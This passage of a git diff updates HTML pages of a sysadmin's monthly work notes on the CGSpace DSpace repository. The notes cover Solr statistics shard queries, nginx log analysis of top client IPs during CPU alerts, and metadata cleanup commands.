         at org.apache.solr.handler.admin.CoreAdminHandler.handleRequestBody(CoreAdminHandler.java:188)
    @@ -721,7 +721,7 @@ Caused by: org.apache.lucene.store.LockObtainFailedException: Lock obtain timed
     
  • For 2019-01 alone the Usage Stats are already around 1.2 million
  • I tried to look in the nginx logs to see how many raw requests there are so far this month and it’s about 1.4 million:
  • -
    # time zcat --force /var/log/nginx/* | grep -cE "[0-9]{1,2}/Jan/2019"
    +
    # time zcat --force /var/log/nginx/* | grep -cE "[0-9]{1,2}/Jan/2019"
     1442874
     
     real    0m17.161s
    @@ -859,30 +859,30 @@ WantedBy=multi-user.target
     
  • I think I might manage this the same way I do the restic releases in the Ansible infrastructure scripts, where I download a specific version and symlink to some generic location without the version number
  • I verified that there is indeed an issue with sharded Solr statistics cores on DSpace, which will cause inaccurate results in the dspace-statistics-api:
  • -
    $ http 'http://localhost:3000/solr/statistics/select?indent=on&rows=0&q=type:2+id:11576&fq=isBot:false&fq=statistics_type:view' | grep numFound
    -<result name="response" numFound="33" start="0">
    -$ http 'http://localhost:3000/solr/statistics-2018/select?indent=on&rows=0&q=type:2+id:11576&fq=isBot:false&fq=statistics_type:view' | grep numFound
    -<result name="response" numFound="241" start="0">
    +
    $ http 'http://localhost:3000/solr/statistics/select?indent=on&rows=0&q=type:2+id:11576&fq=isBot:false&fq=statistics_type:view' | grep numFound
    +<result name="response" numFound="33" start="0">
    +$ http 'http://localhost:3000/solr/statistics-2018/select?indent=on&rows=0&q=type:2+id:11576&fq=isBot:false&fq=statistics_type:view' | grep numFound
    +<result name="response" numFound="241" start="0">
     
    • I opened an issue on the GitHub issue tracker (#10)
    • I don’t think the SolrClient library we are currently using supports these type of queries so we might have to just do raw queries with requests
    • The pysolr library says it supports multicore indexes, but I am not sure it does (or at least not with our setup):
    import pysolr
    -solr = pysolr.Solr('http://localhost:3000/solr/statistics')
    -results = solr.search('type:2', **{'fq': 'isBot:false AND statistics_type:view', 'facet': 'true', 'facet.field': 'id', 'facet.mincount': 1, 'facet.limit': 10, 'facet.offset': 0, 'rows': 0})
    -print(results.facets['facet_fields'])
    -{'id': ['77572', 646, '93185', 380, '92932', 375, '102499', 372, '101430', 337, '77632', 331, '102449', 289, '102485', 276, '100849', 270, '47080', 260]}
    +solr = pysolr.Solr('http://localhost:3000/solr/statistics')
    +results = solr.search('type:2', **{'fq': 'isBot:false AND statistics_type:view', 'facet': 'true', 'facet.field': 'id', 'facet.mincount': 1, 'facet.limit': 10, 'facet.offset': 0, 'rows': 0})
    +print(results.facets['facet_fields'])
    +{'id': ['77572', 646, '93185', 380, '92932', 375, '102499', 372, '101430', 337, '77632', 331, '102449', 289, '102485', 276, '100849', 270, '47080', 260]}
     
    • If I double check one item from above, for example 77572, it appears this is only working on the current statistics core and not the shards:
    import pysolr
    -solr = pysolr.Solr('http://localhost:3000/solr/statistics')
    -results = solr.search('type:2 id:77572', **{'fq': 'isBot:false AND statistics_type:view'})
    +solr = pysolr.Solr('http://localhost:3000/solr/statistics')
    +results = solr.search('type:2 id:77572', **{'fq': 'isBot:false AND statistics_type:view'})
     print(results.hits)
     646
    -solr = pysolr.Solr('http://localhost:3000/solr/statistics-2018/')
    -results = solr.search('type:2 id:77572', **{'fq': 'isBot:false AND statistics_type:view'})
    +solr = pysolr.Solr('http://localhost:3000/solr/statistics-2018/')
    +results = solr.search('type:2 id:77572', **{'fq': 'isBot:false AND statistics_type:view'})
     print(results.hits)
     595
     
      @@ -894,13 +894,13 @@ print(results.hits)
    • I think I figured out how to search across shards, I needed to give the whole URL to each other core
    • Now I get more results when I start adding the other statistics cores:
    -
    $ http 'http://localhost:3000/solr/statistics/select?&indent=on&rows=0&q=*:*' | grep numFound<result name="response" numFound="2061320" start="0">
    -$ http 'http://localhost:3000/solr/statistics/select?&shards=localhost:8081/solr/statistics-2018&indent=on&rows=0&q=*:*' | grep numFound
    -<result name="response" numFound="16280292" start="0" maxScore="1.0">
    -$ http 'http://localhost:3000/solr/statistics/select?&shards=localhost:8081/solr/statistics-2018,localhost:8081/solr/statistics-2017&indent=on&rows=0&q=*:*' | grep numFound
    -<result name="response" numFound="25606142" start="0" maxScore="1.0">
    -$ http 'http://localhost:3000/solr/statistics/select?&shards=localhost:8081/solr/statistics-2018,localhost:8081/solr/statistics-2017,localhost:8081/solr/statistics-2016&indent=on&rows=0&q=*:*' | grep numFound
    -<result name="response" numFound="31532212" start="0" maxScore="1.0">
    +
    $ http 'http://localhost:3000/solr/statistics/select?&indent=on&rows=0&q=*:*' | grep numFound<result name="response" numFound="2061320" start="0">
    +$ http 'http://localhost:3000/solr/statistics/select?&shards=localhost:8081/solr/statistics-2018&indent=on&rows=0&q=*:*' | grep numFound
    +<result name="response" numFound="16280292" start="0" maxScore="1.0">
    +$ http 'http://localhost:3000/solr/statistics/select?&shards=localhost:8081/solr/statistics-2018,localhost:8081/solr/statistics-2017&indent=on&rows=0&q=*:*' | grep numFound
    +<result name="response" numFound="25606142" start="0" maxScore="1.0">
    +$ http 'http://localhost:3000/solr/statistics/select?&shards=localhost:8081/solr/statistics-2018,localhost:8081/solr/statistics-2017,localhost:8081/solr/statistics-2016&indent=on&rows=0&q=*:*' | grep numFound
    +<result name="response" numFound="31532212" start="0" maxScore="1.0">
     
    • I should be able to modify the dspace-statistics-api to check the shards via the Solr core status, then add the shards parameter to each query to make the search distributed among the cores
    • I implemented a proof of concept to query the Solr STATUS for active cores and to add them with a shards query string
    • @@ -913,10 +913,10 @@ $ http 'http://localhost:3000/solr/statistics/select?&shards=localhost:8081/
    -
    $ http 'http://localhost:8081/solr/statistics/select?indent=on&rows=0&q=type:2+id:11576&fq=isBot:false&fq=statistics_type:view&shards=localhost:8081/solr/statistics,localhost:8081/solr/statistics-2018' | grep numFound
    -<result name="response" numFound="275" start="0" maxScore="12.205825">
    -$ http 'http://localhost:8081/solr/statistics/select?indent=on&rows=0&q=type:2+id:11576&fq=isBot:false&fq=statistics_type:view&shards=localhost:8081/solr/statistics-2018' | grep numFound
    -<result name="response" numFound="241" start="0" maxScore="12.205825">
    +
    $ http 'http://localhost:8081/solr/statistics/select?indent=on&rows=0&q=type:2+id:11576&fq=isBot:false&fq=statistics_type:view&shards=localhost:8081/solr/statistics,localhost:8081/solr/statistics-2018' | grep numFound
    +<result name="response" numFound="275" start="0" maxScore="12.205825">
    +$ http 'http://localhost:8081/solr/statistics/select?indent=on&rows=0&q=type:2+id:11576&fq=isBot:false&fq=statistics_type:view&shards=localhost:8081/solr/statistics-2018' | grep numFound
    +<result name="response" numFound="241" start="0" maxScore="12.205825">
     

    2019-01-22

    • Release version 0.9.0 of the dspace-statistics-api to address the issue of querying multiple Solr statistics shards
    • @@ -924,7 +924,7 @@ $ http 'http://localhost:8081/solr/statistics/select?indent=on&rows=0&q=
    • I deployed it on CGSpace (linode18) and restarted the indexer as well
    • Linode sent an alert that CGSpace (linode18) was using high CPU this afternoon, the top ten IPs during that time were:
    -
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "22/Jan/2019:1(4|5|6)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "22/Jan/2019:1(4|5|6)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
         155 40.77.167.106
         176 2003:d5:fbda:1c00:1106:c7a0:4b17:3af8
         189 107.21.16.70
    @@ -979,13 +979,13 @@ $ http 'http://localhost:8081/solr/statistics/select?indent=on&rows=0&q=
     

    I got a list of their collections from the CGSpace XMLUI and then used an SQL query to dump the unique values to CSV:

    -
    dspace=# \copy (select distinct text_value, count(*) from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'affiliation') AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in ('10568/35501', '10568/41728', '10568/49622', '10568/56589', '10568/56592', '10568/65064', '10568/65718', '10568/65719', '10568/67373', '10568/67731', '10568/68235', '10568/68546', '10568/69089', '10568/69160', '10568/69419', '10568/69556', '10568/70131', '10568/70252', '10568/70978'))) group by text_value order by count desc) to /tmp/bioversity-affiliations.csv with csv;
    +
    dspace=# \copy (select distinct text_value, count(*) from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'affiliation') AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in ('10568/35501', '10568/41728', '10568/49622', '10568/56589', '10568/56592', '10568/65064', '10568/65718', '10568/65719', '10568/67373', '10568/67731', '10568/68235', '10568/68546', '10568/69089', '10568/69160', '10568/69419', '10568/69556', '10568/70131', '10568/70252', '10568/70978'))) group by text_value order by count desc) to /tmp/bioversity-affiliations.csv with csv;
     COPY 1109
     
    • Send a mail to the dspace-tech mailing list about the OpenSearch issue we had with the Livestock CRP
    • Linode sent an alert that CGSpace (linode18) had a high load this morning, here are the top ten IPs during that time:
    -
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "23/Jan/2019:0(4|5|6)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "23/Jan/2019:0(4|5|6)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
         222 54.226.25.74
         241 40.77.167.13
         272 46.101.86.248
    @@ -1038,13 +1038,13 @@ $ schedtool -D -e ionice -c2 -n7 nice -n19 /home/cgspace.cgiar.org/bin/dspace fi
     zsh: abort (core dumped)  identify Food\ safety\ Kenya\ fruits.pdf\[0\]
     $ identify Food\ safety\ Kenya\ fruits.pdf\[0\]
     Food safety Kenya fruits.pdf[0]=>Food safety Kenya fruits.pdf PDF 612x792 612x792+0+0 16-bit sRGB 64626B 0.000u 0:00.000
    -identify: CorruptImageProfile `xmp' @ warning/profile.c/SetImageProfileInternal/1747.
    +identify: CorruptImageProfile `xmp' @ warning/profile.c/SetImageProfileInternal/1747.
     
    • I reported it to the Arch Linux bug tracker (61513)
    • I told Atmire to go ahead with the Metadata Quality Module addition based on our 5_x-dev branch (657)
    • Linode sent alerts last night to say that CGSpace (linode18) was using high CPU last night, here are the top ten IPs from the nginx logs around that time:
    -
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "23/Jan/2019:(18|19|20)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "23/Jan/2019:(18|19|20)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
         305 3.81.136.184
         306 3.83.14.11
         306 52.54.252.47
    @@ -1059,7 +1059,7 @@ identify: CorruptImageProfile `xmp' @ warning/profile.c/SetImageProfileInternal/
     
  • 45.5.186.2 is CIAT and 66.249.64.155 is Google… hmmm.
  • Linode sent another alert this morning, here are the top ten IPs active during that time:
  • -
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "24/Jan/2019:0(4|5|6)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "24/Jan/2019:0(4|5|6)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
         360 3.89.134.93
         362 34.230.15.139
         366 100.24.48.177
    @@ -1073,7 +1073,7 @@ identify: CorruptImageProfile `xmp' @ warning/profile.c/SetImageProfileInternal/
     
    • Just double checking what CIAT is doing, they are mainly hitting the REST API:
    -
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "24/Jan/2019:" | grep 45.5.186.2 | grep -Eo "GET /(handle|bitstream|rest|oai)/" | sort | uniq -c | sort -n
    +
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "24/Jan/2019:" | grep 45.5.186.2 | grep -Eo "GET /(handle|bitstream|rest|oai)/" | sort | uniq -c | sort -n
     
    • CIAT’s community currently has 12,000 items in it so this is normal
    • The issue with goo.gl links that we saw yesterday appears to be resolved, as links are working again…
    • @@ -1102,7 +1102,7 @@ identify: CorruptImageProfile `xmp' @ warning/profile.c/SetImageProfileInternal/
      • Linode sent an email that the server was using a lot of CPU this morning, and these were the top IPs in the web server logs at the time:
      -
      # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "27/Jan/2019:0(6|7|8)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
      +
      # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "27/Jan/2019:0(6|7|8)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
           189 40.77.167.108
           191 157.55.39.2
           263 34.218.226.147
      @@ -1132,7 +1132,7 @@ identify: CorruptImageProfile `xmp' @ warning/profile.c/SetImageProfileInternal/
       
       
    • Linode alerted that CGSpace (linode18) was using too much CPU again this morning, here are the active IPs from the web server log at the time:
    -
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "28/Jan/2019:0(6|7|8)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "28/Jan/2019:0(6|7|8)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
          67 207.46.13.50
         105 41.204.190.40
         117 34.218.226.147
    @@ -1153,7 +1153,7 @@ identify: CorruptImageProfile `xmp' @ warning/profile.c/SetImageProfileInternal/
     
     
  • Last night Linode sent an alert that CGSpace (linode18) was using high CPU, here are the most active IPs in the hours just before, during, and after the alert:
  • -
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "28/Jan/2019:(17|18|19|20|21)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "28/Jan/2019:(17|18|19|20|21)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
         310 45.5.184.2
         425 5.143.231.39
         526 54.70.40.11
    @@ -1173,7 +1173,7 @@ identify: CorruptImageProfile `xmp' @ warning/profile.c/SetImageProfileInternal/
     
    • Linode sent an alert about CGSpace (linode18) CPU usage this morning, here are the top IPs in the web server logs just before, during, and after the alert:
    -
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "29/Jan/2019:0(3|4|5|6|7)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "29/Jan/2019:0(3|4|5|6|7)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
         334 45.5.184.72
         429 66.249.66.223
         522 35.237.175.180
    @@ -1198,7 +1198,7 @@ identify: CorruptImageProfile `xmp' @ warning/profile.c/SetImageProfileInternal/
     
    • Got another alert from Linode about CGSpace (linode18) this morning, here are the top IPs before, during, and after the alert:
    -
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "30/Jan/2019:0(5|6|7|8|9)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "30/Jan/2019:0(5|6|7|8|9)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
         273 46.101.86.248
         301 35.237.175.180
         334 45.5.184.72
    @@ -1216,7 +1216,7 @@ identify: CorruptImageProfile `xmp' @ warning/profile.c/SetImageProfileInternal/
     
    • Linode sent alerts about CGSpace (linode18) last night and this morning, here are the top IPs before, during, and after those times:
    -
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "30/Jan/2019:(16|17|18|19|20)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "30/Jan/2019:(16|17|18|19|20)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
         436 18.196.196.108
         460 157.55.39.168
         460 207.46.13.96
    @@ -1227,7 +1227,7 @@ identify: CorruptImageProfile `xmp' @ warning/profile.c/SetImageProfileInternal/
        1601 85.25.237.71
        1894 66.249.66.219
        2610 45.5.184.2
    -# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "31/Jan/2019:0(2|3|4|5|6)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "31/Jan/2019:0(2|3|4|5|6)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
         318 207.46.13.242
         334 45.5.184.72
         486 35.237.175.180
    diff --git a/docs/2019-02/index.html b/docs/2019-02/index.html
    index 669d2db50..9ab8180fc 100644
    --- a/docs/2019-02/index.html
    +++ b/docs/2019-02/index.html
    @@ -12,7 +12,7 @@
     Linode has alerted a few times since last night that the CPU usage on CGSpace (linode18) was high despite me increasing the alert threshold last week from 250% to 275%—I might need to increase it again!
     The top IPs before, during, and after this latest alert tonight were:
     
    -# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "01/Feb/2019:(17|18|19|20|21)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "01/Feb/2019:(17|18|19|20|21)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
         245 207.46.13.5
         332 54.70.40.11
         385 5.143.231.38
    @@ -28,7 +28,7 @@ The top IPs before, during, and after this latest alert tonight were:
     The Solr statistics the past few months have been very high and I was wondering if the web server logs also showed an increase
     There were just over 3 million accesses in the nginx logs last month:
     
    -# time zcat --force /var/log/nginx/* | grep -cE "[0-9]{1,2}/Jan/2019"
    +# time zcat --force /var/log/nginx/* | grep -cE "[0-9]{1,2}/Jan/2019"
     3018243
     
     real    0m19.873s
    @@ -49,7 +49,7 @@ sys     0m1.979s
     Linode has alerted a few times since last night that the CPU usage on CGSpace (linode18) was high despite me increasing the alert threshold last week from 250% to 275%—I might need to increase it again!
     The top IPs before, during, and after this latest alert tonight were:
     
    -# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "01/Feb/2019:(17|18|19|20|21)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "01/Feb/2019:(17|18|19|20|21)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
         245 207.46.13.5
         332 54.70.40.11
         385 5.143.231.38
    @@ -65,14 +65,14 @@ The top IPs before, during, and after this latest alert tonight were:
     The Solr statistics the past few months have been very high and I was wondering if the web server logs also showed an increase
     There were just over 3 million accesses in the nginx logs last month:
     
    -# time zcat --force /var/log/nginx/* | grep -cE "[0-9]{1,2}/Jan/2019"
    +# time zcat --force /var/log/nginx/* | grep -cE "[0-9]{1,2}/Jan/2019"
     3018243
     
     real    0m19.873s
     user    0m22.203s
     sys     0m1.979s
     "/>
    -
    +
     
     
         
    @@ -163,7 +163,7 @@ sys     0m1.979s
     
  • Linode has alerted a few times since last night that the CPU usage on CGSpace (linode18) was high despite me increasing the alert threshold last week from 250% to 275%—I might need to increase it again!
  • The top IPs before, during, and after this latest alert tonight were:
  • -
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "01/Feb/2019:(17|18|19|20|21)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "01/Feb/2019:(17|18|19|20|21)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
         245 207.46.13.5
         332 54.70.40.11
         385 5.143.231.38
    @@ -179,7 +179,7 @@ sys     0m1.979s
     
  • The Solr statistics the past few months have been very high and I was wondering if the web server logs also showed an increase
  • There were just over 3 million accesses in the nginx logs last month:
  • -
    # time zcat --force /var/log/nginx/* | grep -cE "[0-9]{1,2}/Jan/2019"
    +
    # time zcat --force /var/log/nginx/* | grep -cE "[0-9]{1,2}/Jan/2019"
     3018243
     
     real    0m19.873s
    @@ -198,7 +198,7 @@ sys     0m1.979s
     
    • Another alert from Linode about CGSpace (linode18) this morning, here are the top IPs in the web server logs before, during, and after that time:
    -
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "02/Feb/2019:0(1|2|3|4|5)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "02/Feb/2019:0(1|2|3|4|5)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
         284 18.195.78.144
         329 207.46.13.32
         417 35.237.175.180
    @@ -219,7 +219,7 @@ sys     0m1.979s
     
  • This is seriously getting annoying, Linode sent another alert this morning that CGSpace (linode18) load was 377%!
  • Here are the top IPs before, during, and after that time:
  • -
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "03/Feb/2019:0(5|6|7|8|9)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "03/Feb/2019:0(5|6|7|8|9)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
         325 85.25.237.71
         340 45.5.184.72
         431 5.143.231.8
    @@ -238,7 +238,7 @@ sys     0m1.979s
     
    • This user was making 20–60 requests per minute this morning… seems like I should try to block this type of behavior heuristically, regardless of user agent!
    -
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "03/Feb/2019" | grep 195.201.104.240 | grep -o -E '03/Feb/2019:0[0-9]:[0-9][0-9]' | uniq -c | sort -n | tail -n 20
    +
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "03/Feb/2019" | grep 195.201.104.240 | grep -o -E '03/Feb/2019:0[0-9]:[0-9][0-9]' | uniq -c | sort -n | tail -n 20
          19 03/Feb/2019:07:42
          20 03/Feb/2019:07:12
          21 03/Feb/2019:07:27
    @@ -262,7 +262,7 @@ sys     0m1.979s
     
    • At least they re-used their Tomcat session!
    -
    $ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=195.201.104.240' dspace.log.2019-02-03 | sort | uniq | wc -l
    +
    $ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=195.201.104.240' dspace.log.2019-02-03 | sort | uniq | wc -l
     1
     
    • This user was making requests to /browse, which is not currently under the existing rate limiting of dynamic pages in our nginx config @@ -287,7 +287,7 @@ COPY 321
    • Discuss the new IITA research theme field with Abenet and decide that we should use cg.identifier.iitatheme
    • This morning there was another alert from Linode about the high load on CGSpace (linode18), here are the top IPs in the web server logs before, during, and after that time:
    -
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "04/Feb/2019:0(5|6|7|8|9)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "04/Feb/2019:0(5|6|7|8|9)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
         589 2a01:4f8:140:3192::2
         762 66.249.66.219
         889 35.237.175.180
    @@ -318,12 +318,12 @@ COPY 321
     
    -
    $ ./fix-metadata-values.py -i 2019-02-04-Correct-65-CTA-Subjects.csv -f cg.subject.cta -t CORRECT -m 124 -db dspace -u dspace -p 'fuu' -d
    -$ ./delete-metadata-values.py -i 2019-02-04-Delete-16-CTA-Subjects.csv -f cg.subject.cta -m 124 -db dspace -u dspace -p 'fuu' -d
    +
    $ ./fix-metadata-values.py -i 2019-02-04-Correct-65-CTA-Subjects.csv -f cg.subject.cta -t CORRECT -m 124 -db dspace -u dspace -p 'fuu' -d
    +$ ./delete-metadata-values.py -i 2019-02-04-Delete-16-CTA-Subjects.csv -f cg.subject.cta -m 124 -db dspace -u dspace -p 'fuu' -d
     
    • I applied them on DSpace Test and CGSpace and started a full Discovery re-index:
    -
    $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx1024m"
    +
    $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx1024m"
     $ time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
     
    • Peter had marked several terms with || to indicate multiple values in his corrections so I will have to go back and do those manually:
    • @@ -344,7 +344,7 @@ PESCAS E AQUACULTURE,PISCICULTURA||AQUACULTURE
    • Then I used csvcut to get only the CTA subject columns:
    -
    $ csvcut -c "id,collection,cg.subject.cta,cg.subject.cta[],cg.subject.cta[en_US]" /tmp/cta.csv > /tmp/cta-subjects.csv
    +
    $ csvcut -c "id,collection,cg.subject.cta,cg.subject.cta[],cg.subject.cta[en_US]" /tmp/cta.csv > /tmp/cta-subjects.csv
     
    • After that I imported the CSV into OpenRefine where I could properly identify and edit the subjects as multiple values
    • Then I imported it back into CGSpace:
    • @@ -354,7 +354,7 @@ PESCAS E AQUACULTURE,PISCICULTURA||AQUACULTURE
    • Another day, another alert about high load on CGSpace (linode18) from Linode
    • This time the load average was 370% and the top ten IPs before, during, and after that time were:
    -
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "06/Feb/2019:0(5|6|7|8|9)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "06/Feb/2019:0(5|6|7|8|9)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
         689 35.237.175.180
        1236 5.9.6.51
        1305 34.218.226.147
    @@ -368,7 +368,7 @@ PESCAS E AQUACULTURE,PISCICULTURA||AQUACULTURE
     
    • Looking closer at the top users, I see 45.5.186.2 is in Brazil and was making over 100 requests per minute to the REST API:
    -
    # zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 | grep 45.5.186.2 | grep -o -E '06/Feb/2019:0[0-9]:[0-9][0-9]' | uniq -c | sort -n | tail -n 10
    +
    # zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 | grep 45.5.186.2 | grep -o -E '06/Feb/2019:0[0-9]:[0-9][0-9]' | uniq -c | sort -n | tail -n 10
         118 06/Feb/2019:05:46
         119 06/Feb/2019:05:37
         119 06/Feb/2019:05:47
    @@ -382,7 +382,7 @@ PESCAS E AQUACULTURE,PISCICULTURA||AQUACULTURE
     
    • I was thinking of rate limiting those because I assumed most of them would be errors, but actually most are HTTP 200 OK!
    -
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E '06/Feb/2019' | grep 45.5.186.2 | awk '{print $9}' | sort | uniq -c
    +
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E '06/Feb/2019' | grep 45.5.186.2 | awk '{print $9}' | sort | uniq -c
       10411 200
           1 301
           7 302
    @@ -392,7 +392,7 @@ PESCAS E AQUACULTURE,PISCICULTURA||AQUACULTURE
     
    • I should probably start looking at the top IPs for web (XMLUI) and for API (REST and OAI) separately:
    -
    # zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E "06/Feb/2019:0(5|6|7|8|9)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +
    # zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E "06/Feb/2019:0(5|6|7|8|9)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
         328 220.247.212.35
         372 66.249.66.221
         380 207.46.13.2
    @@ -403,7 +403,7 @@ PESCAS E AQUACULTURE,PISCICULTURA||AQUACULTURE
        1236 5.9.6.51
        1554 66.249.66.219
        4942 85.25.237.71
    -# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E "06/Feb/2019:0(5|6|7|8|9)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E "06/Feb/2019:0(5|6|7|8|9)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
          10 66.249.66.221
          26 66.249.66.219
          69 5.143.231.8
    @@ -419,7 +419,7 @@ PESCAS E AQUACULTURE,PISCICULTURA||AQUACULTURE
     
  • Linode sent an alert last night that the load on CGSpace (linode18) was over 300%
  • Here are the top IPs in the web server and API logs before, during, and after that time, respectively:
  • -
    # zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E "06/Feb/2019:(17|18|19|20|23)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +
    # zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E "06/Feb/2019:(17|18|19|20|23)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
           5 66.249.66.209
           6 2a01:4f8:210:51ef::2
           6 40.77.167.75
    @@ -430,7 +430,7 @@ PESCAS E AQUACULTURE,PISCICULTURA||AQUACULTURE
          20 95.108.181.88
          27 66.249.66.219
        2381 45.5.186.2
    -# zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E "06/Feb/2019:(17|18|19|20|23)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +# zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E "06/Feb/2019:(17|18|19|20|23)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
         455 45.5.186.2
         506 40.77.167.75
